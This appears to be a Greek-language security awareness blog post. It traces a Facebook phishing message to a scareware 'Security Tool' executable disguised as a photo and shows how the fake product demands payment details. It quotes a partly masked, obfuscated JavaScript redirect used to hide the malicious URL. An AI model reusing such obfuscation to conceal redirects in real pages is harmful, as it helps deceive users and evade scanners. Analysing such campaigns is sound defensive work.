Ξαφνικά βλέπεις στο mailbox πως έχεις μήνυμα από κάποιο φίλο σου στο Facebook όπως το παρακάτω:

ScreenHunter_01 Nov. 02 20.36

Το μήνυμα είναι πραγματικό και ήρθε από φίλο που προφανώς είχε πολύ εύκολο κωδικό στο facebook με αποτέλεσμα να μπορέσει κάποιος άλλος να ελέγχει παράλληλα το λογαριασμό του.

Όπως βλέπετε το Link που μας προτρέπει να ακολουθήσουμε φαίνεται περίεργο ειδικά προς το τέλος! Οπότε λέω ας διαβάσουμε το μήνυμα να δούμε τι “έκλπηξη” μας έχει ετοιμάσει ο καλός μας φίλος.

Κάνοντας κλικ ανακατευθυνόμαστε μέσω του facebook στο παρακάτω site

www(dot)XXXkewopobemil(dot)blogspot(dot)com

το οποίο με τη σειρά του μέσα στο source code της σελίδας περιέχει το συγκεκριμένο javascript μέσω του οποίου μπορούμε να κρύβουμε urls

location.href='http://'+'\u0077\u0077\u0077\u002e'+'\u0066\u0072\u0065\u0065\u002d'+'XXXXX'+unescape('%XX%XX%XX%XX%XX')+'\u006f\u0061\u006c\u0062'+'\u0075\u006d\u0073\u002e\u006f\u0072'+unescape('%67')+''

Αυτό που βλέπετε εδώ είναι μίγμα από ASCII χαρακτήρες π.χ. \u0077 = w ταυτόχρονα με την μέθοδο unescape της Javascript όπου επιτρέπει να γίνονται encode urls και χρησιμοποιείται σε μεγάλο βαθμό για να ξεγελάει browsers. AV etc.

Στην ουσία επανακατευθυνόμαστε στο site www(dot)XXX-XXXX-fotoalbums(dot)org(slash)2(slash)index(dot)html 

όπου μας περιμένει επιτέλους η έκπληξη

image

Εδώ κάνοντας κλικ στο link κατεβάζει το αρχείο

  ScreenHunter_06 Nov. 02 21.32 το οποίο δείχνει να μην είναι τίποτα παραπάνω από μια φώτο. Βέβαια κάνοντας διπλό κλικ τελικά αυτό είναι εκτελέσιμο (.exe) και όχι jpg αρχείο ή κάτι παρόμοιο.

Οπότε έχουμε την παρακάτω σειρά από γεγονότα που συμβαίνουν

ScreenHunter_03 Nov. 02 21.37

Μια φώτο κενή αλλά ένδειξη πως εγκαταστάθηκε επιτυχώς το Security Tool. Ευτυχώς σωθήκαμε! Smile

Αυτό ως σωστό security tool ξεκινά έλεγχο και βρίσκει πως είμαστε infected

ScreenHunter_07 Nov. 02 21.37

 

Tέλος μας προτείνει να καθαρίσουμε τον βρωμερό μας Η/Υ από όλα τα malware/virus που βρήκε

ScreenHunter_08 Nov. 02 21.38

Έχουμε 2 επιλογές όπως φαίνεται και παραπάνω “Remove all threats now” ή “Continue unprotected”

Ο μέσος χρήστης το πιο πιθανό είναι πως θα επιλέξει την 1η επιλογή οπότε με τη σειρά του έρχεται το παρακάτω

ScreenHunter_13 Nov. 02 21.40

όπου μας ζητάει να κάνουμε activate το προϊόν, επιλέγοντας την πρώτη επιλογή φτάνουμε στο ζουμί!!!

ScreenHunter_10 Nov. 02 21.38

Εδώ πλέον πρέπει να δώσουμε τα στοιχεία μας ώστε να ξεμπερδεύουμε από το κακό που μας βρήκε.

Αυτό που συμβαίνει πλέον είναι πως ο υπολογιστής μας μέσω internet ανεβάζει ότι στοιχεία δώσουμε και κατεβάζει ενδιαφέροντα software. Smile

ScreenHunter_09 Nov. 02 22.12

Απλά πράγματα!

Τώρα θα μου πείτε μα καλά δεν το πιάνουν τα Antivirus; με ένα απλό τεστ που έκανα στο virustotal.com (online multiple AV scanner)

ScreenHunter_08 Nov. 02 21.53

Όπως βλέπετε μόνο 10 από τα 42 το εντοπίζουν προς το παρόν!